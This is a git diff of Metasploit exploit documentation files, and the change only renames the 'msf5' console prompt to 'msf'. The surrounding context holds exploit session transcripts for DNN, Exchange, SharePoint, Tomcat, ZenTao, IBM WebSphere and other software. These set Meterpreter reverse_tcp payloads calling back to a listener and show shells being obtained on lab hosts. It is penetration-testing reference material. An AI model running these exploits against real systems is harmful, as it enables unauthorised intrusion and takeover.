@@ -187,13 +187,13 @@ The expected structure includes a "type" attribute to instruct the server which Here's showing the expected output: ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... @@ -201,7 +201,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [*] 192.168.31.131:8083 - The target appears to be vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. 
@@ -224,16 +224,16 @@ The expected structure includes a "type" attribute to instruct the server which Here's showing the expected output ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_ - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_ + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... 
@@ -241,7 +241,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [*] 192.168.31.131:8084 - The target appears to be vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. 
@@ -270,17 +270,17 @@ The expected structure includes a "type" attribute to instruct the server which Here's the expected output: ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_ - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_ + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true + msf 
exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... @@ -288,7 +288,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [+] 192.168.31.131:8085 - The target appears to be vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. 
@@ -317,23 +317,23 @@ The expected structure includes a "type" attribute to instruct the server which Here's the expected output: ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0- - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0- + msf 
exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [+] 192.168.31.131:8090 - The target is vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. diff --git a/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md b/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md index b133586b55..385112bde5 100644 --- a/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md +++ b/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md 
@@ -50,20 +50,20 @@ Password to log in with For example: ``` -msf5 > use exploit/windows/http/exchange_ecp_viewstate -msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129 +msf > use exploit/windows/http/exchange_ecp_viewstate +msf exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129 RHOSTS => 192.168.159.129 -msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe +msf exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe USERNAME => msflab.local\jdoe -msf5 exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1 +msf exploit(windows/http/exchange_ecp_viewstate) > set PASSWORD Password1 PASSWORD => Password1 -msf5 exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1 +msf exploit(windows/http/exchange_ecp_viewstate) > set TARGET 1 TARGET => 1 -msf5 exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(windows/http/exchange_ecp_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128 +msf exploit(windows/http/exchange_ecp_viewstate) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 -msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit +msf exploit(windows/http/exchange_ecp_viewstate) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Command Stager progress - 3.61% done (449/12424 bytes) diff --git a/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md b/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md index fff2ec85be..f7483817e2 100644 --- a/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md +++ b/documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md 
@@ -26,10 +26,10 @@ Once installed run the application and click "Start" to enable the server. ## Scenarios ``` -msf5 > use exploit/windows/http/file_sharing_wizard_seh -msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101 +msf > use exploit/windows/http/file_sharing_wizard_seh +msf exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 -msf5 exploit(windows/http/file_sharing_wizard_seh) > run +msf exploit(windows/http/file_sharing_wizard_seh) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.101:80 - Connecting to target diff --git a/documentation/modules/exploit/windows/http/gitstack_rce.md b/documentation/modules/exploit/windows/http/gitstack_rce.md index 8e486bab88..c8da26b62c 100644 --- a/documentation/modules/exploit/windows/http/gitstack_rce.md +++ b/documentation/modules/exploit/windows/http/gitstack_rce.md @@ -33,12 +33,12 @@ be under a certain size. ### GitStack v2.3.10 on Windows 7 SP1 ``` -msf5 > use exploit/windows/http/gitstack_rce -msf5 exploit(windows/http/gitstack_rce) > set rhost 172.22.222.122 +msf > use exploit/windows/http/gitstack_rce +msf exploit(windows/http/gitstack_rce) > set rhost 172.22.222.122 rhost => 172.22.222.122 -msf5 exploit(windows/http/gitstack_rce) > set verbose true +msf exploit(windows/http/gitstack_rce) > set verbose true verbose => true -msf5 exploit(windows/http/gitstack_rce) > run +msf exploit(windows/http/gitstack_rce) > run [*] Started reverse TCP handler on 172.22.222.131:4444 [*] Powershell command length: 6103 diff --git a/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md b/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md index 12435d6b04..a8a5594f1c 100644 --- a/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md +++ b/documentation/modules/exploit/windows/http/kentico_staging_syncserver.md 
@@ -39,7 +39,7 @@ The vulnerable application is available for download at: ### Kentico CMS v11.0 trial on Windows 7 SP 1 x64 ``` -msf5 exploit(windows/http/kentico_staging_syncserver) > show options +msf exploit(windows/http/kentico_staging_syncserver) > show options Module options (exploit/windows/http/kentico_staging_syncserver): @@ -73,7 +73,7 @@ Exploit target: 0 Windows EXE Dropper -msf5 exploit(windows/http/kentico_staging_syncserver) > exploit +msf exploit(windows/http/kentico_staging_syncserver) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Command Stager progress - 24.99% done (2999/12002 bytes) diff --git a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md index c8af3b319b..fd4c2d6338 100644 --- a/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md +++ b/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md 
@@ -26,17 +26,17 @@ A successful check of the exploit will look like this: ## Scenarios ``` -msf5 > -msf5 > use exploit/windows/http/manageengine_appmanager_exec -msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192 +msf > +msf > use exploit/windows/http/manageengine_appmanager_exec +msf exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192 RHOST => 12.0.0.192 -msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1 +msf exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1 LHOST => 12.0.0.1 -msf5 exploit(windows/http/manageengine_appmanager_exec) > check +msf exploit(windows/http/manageengine_appmanager_exec) > check [+] 12.0.0.192:9090 The target is vulnerable. -msf5 exploit(windows/http/manageengine_appmanager_exec) > run +msf exploit(windows/http/manageengine_appmanager_exec) > run [*] Started reverse TCP handler on 12.0.0.1:4444 [*] Triggering the vulnerability diff --git a/documentation/modules/exploit/windows/http/oats_weblogic_console.md b/documentation/modules/exploit/windows/http/oats_weblogic_console.md index 38cdce0a6b..0718232620 100644 --- a/documentation/modules/exploit/windows/http/oats_weblogic_console.md +++ b/documentation/modules/exploit/windows/http/oats_weblogic_console.md 
@@ -30,9 +30,9 @@ credentials, decrypt them using a third-party tool, and then use this module to ## Scenarios ``` -msf5 exploit(windows/http/oats_weblogic_console) > check +msf exploit(windows/http/oats_weblogic_console) > check [*] 172.16.135.128:8088 - The target service is running, but could not be validated. -msf5 exploit(windows/http/oats_weblogic_console) > run +msf exploit(windows/http/oats_weblogic_console) > run [*] Started reverse TCP handler on 172.16.135.1:4444 [+] Logged in as oats:VeryPhat1337 diff --git a/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md b/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md index a0a4fa6527..0bcc5b121e 100644 --- a/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md +++ b/documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md @@ -56,8 +56,8 @@ set to port **8401** by default for Plesk installations. ### myLittleAdmin 3.8 on Plesk Obsidian on Windows Server 2016 ``` -msf5 > use exploit/windows/http/plesk_mylittleadmin_viewstate -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > options +msf > use exploit/windows/http/plesk_mylittleadmin_viewstate +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > options Module options (exploit/windows/http/plesk_mylittleadmin_viewstate): 
@@ -91,11 +91,11 @@ Exploit target: 2 PowerShell Stager -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169 +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169 rhosts => 172.16.249.169 -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1 +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run +msf exploit(windows/http/plesk_mylittleadmin_viewstate) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md index 1975c49b8f..9b11f2e7db 100644 --- a/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md +++ b/documentation/modules/exploit/windows/http/plex_unpickle_dict_rce.md @@ -113,7 +113,7 @@ Amount of seconds to sleep waiting on the server to reboot. In testing `10` see PLEX_TOKEN => aa1g1aa3aaHbAtPBsEG7 resource (plex.rb)> set verbose true verbose => true - msf5 exploit(windows/http/plex_unpickle_dict_rce) > exploit + msf exploit(windows/http/plex_unpickle_dict_rce) > exploit [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Gathering Plex Config diff --git a/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md b/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md index ca8139c659..df4feee663 100644 --- a/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md +++ b/documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md 
@@ -46,28 +46,28 @@ Administration web interface **is not vulnerable**. To configure SharePoint to b ### SharePoint 2016 on Server 2016 ``` -msf5 > use exploit/windows/http/sharepoint_data_deserialization +msf > use exploit/windows/http/sharepoint_data_deserialization [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp -msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168 +msf exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168 RHOSTS => 192.168.63.168 -msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80 +msf exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80 RPORT => 80 -msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false +msf exploit(windows/http/sharepoint_data_deserialization) > set SSL false [!] Changing the SSL option's value may require changing RPORT! SSL => false -msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v +msf exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v VHOST => ec2amaz-v2pri0v -msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre +msf exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre USERNAME => smcintyre -msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1 +msf exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1 PASSWORD => Password1 -msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT +msf exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT DOMAIN => SHRPNT -msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/http/sharepoint_data_deserialization) > 
check +msf exploit(windows/http/sharepoint_data_deserialization) > check [*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form. -msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit +msf exploit(windows/http/sharepoint_data_deserialization) > exploit [*] Executing automatic check (disable AutoCheck to override) [!] The service is running, but could not be validated. Received the quicklinks HTML form. diff --git a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md index a2017563f1..7e00364d02 100644 --- a/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md +++ b/documentation/modules/exploit/windows/http/sharepoint_workflows_xoml.md @@ -19,7 +19,7 @@ sent to SharePoint via the Workflows functionality. ### SharePoint 2019 on Server 2016 ``` -msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options +msf exploit(windows/http/sharepoint_workflows_xoml) > show options Module options (exploit/windows/http/sharepoint_workflows_xoml): @@ -56,7 +56,7 @@ Exploit target: 2 Windows Powershell -msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit +msf exploit(windows/http/sharepoint_workflows_xoml) > exploit [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. @@ -75,4 +75,4 @@ Meterpreter : x64/windows meterpreter > getuid Server username: SHRPNT2019P\Administrator meterpreter > -``` \ No newline at end of file +``` diff --git a/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md b/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md index 1335c3e0d2..61126c8bcd 100644 --- a/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md +++ b/documentation/modules/exploit/windows/http/ssrs_navcorrector_viewstate.md 
@@ -48,22 +48,22 @@ from "Site Settings" to add the necessary privileges.** ### SSRS 2016 on Server 2012 x64 - msf5 > use exploit/windows/http/ssrs_navcorrector_viewstate - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set RHOSTS 192.168.159.141 + msf > use exploit/windows/http/ssrs_navcorrector_viewstate + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set RHOSTS 192.168.159.141 RHOSTS => 192.168.159.141 - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set USERNAME jdoe + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set USERNAME jdoe USERNAME => jdoe - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set DOMAIN msflab.local + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set DOMAIN msflab.local DOMAIN => msflab.local - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PASSWORD Password1 + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set PASSWORD Password1 PASSWORD => Password1 - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > set LHOST 192.168.159.128 + msf exploit(windows/http/ssrs_navcorrector_viewstate) > set LHOST 192.168.159.128 LHOST => 192.168.159.128 - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > check + msf exploit(windows/http/ssrs_navcorrector_viewstate) > check [*] 192.168.159.141:80 - The service is running, but could not be validated. - msf5 exploit(windows/http/ssrs_navcorrector_viewstate) > exploit + msf exploit(windows/http/ssrs_navcorrector_viewstate) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Command Stager progress - 24.99% done (2999/12002 bytes) 
diff --git a/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md b/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md index c4a53d497f..e459b41165 100644 --- a/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md +++ b/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md @@ -70,14 +70,14 @@ echo Hello, World! The check method of the exploit explicitly triggers the bug to verify the vulnerable, therefore it should be accurate. To use it, here is an example: ``` -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > check [+] 172.16.135.141:8080 - The target is vulnerable. ``` #### Code Execution ``` -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit [*] Started reverse TCP handler on 172.16.135.1:4444 [*] Checking if 172.16.135.141 is vulnerable @@ -106,9 +106,9 @@ meterpreter > ### Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200) ``` -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > check [+] 2.2.2.2:8080 - The target is vulnerable. -msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run +msf exploit(windows/http/tomcat_cgi_cmdlineargs) > run [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Checking if 2.2.2.2 is vulnerable diff --git a/documentation/modules/exploit/windows/http/zentao_pro_rce.md b/documentation/modules/exploit/windows/http/zentao_pro_rce.md index 972713b8e2..cb5d0d4493 100644 --- a/documentation/modules/exploit/windows/http/zentao_pro_rce.md +++ b/documentation/modules/exploit/windows/http/zentao_pro_rce.md @@ -51,7 +51,7 @@ Id Name ## Scenarios ### ZenTao 8.8.2 running on Windows 10 (XAMPP server) ``` -msf5 exploit(windows/http/zentao_pro_rce) > show options +msf exploit(windows/http/zentao_pro_rce) > show options Module options (exploit/windows/http/zentao_pro_rce): 
@@ -88,7 +88,7 @@ Exploit target: 1 Windows (x64) -msf5 exploit(windows/http/zentao_pro_rce) > run +msf exploit(windows/http/zentao_pro_rce) > run [*] Started reverse TCP handler on 192.168.1.12:4444 [+] Successfully authenticated to ZenTao 8.8.2. diff --git a/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md b/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md index f63a8a1ecc..cbd0825e20 100644 --- a/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md +++ b/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md @@ -29,10 +29,10 @@ The exploit module contains several targets as detailed below. This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). ``` -msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 +msf > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.200:11006 - Connected to IBM WAS DMGR. 
@@ -59,16 +59,16 @@ meterpreter > exit This target isn't a formal target. It was added to allow a user to execute commands entirely through the IBM Websphere Application Network Deployment Server remote administration feature. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0. ``` -msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 +msf > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200 rhosts => 172.22.222.200 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set target 1 +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set target 1 target => 1 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload cmd/windows/generic +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload cmd/windows/generic payload => cmd/windows/generic -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set cmd "ping -n 10 172.22.222.200" +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set cmd "ping -n 10 172.22.222.200" cmd => ping -n 10 172.22.222.200 -msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > run +msf exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > run [*] 172.22.222.200:11006 - Connected to IBM WAS DMGR. [*] 172.22.222.200:11006 - Server responded diff --git a/documentation/modules/exploit/windows/local/alpc_taskscheduler.md b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md index 4cbb38d5e1..3e597dd03e 100644 --- a/documentation/modules/exploit/windows/local/alpc_taskscheduler.md +++ b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md 
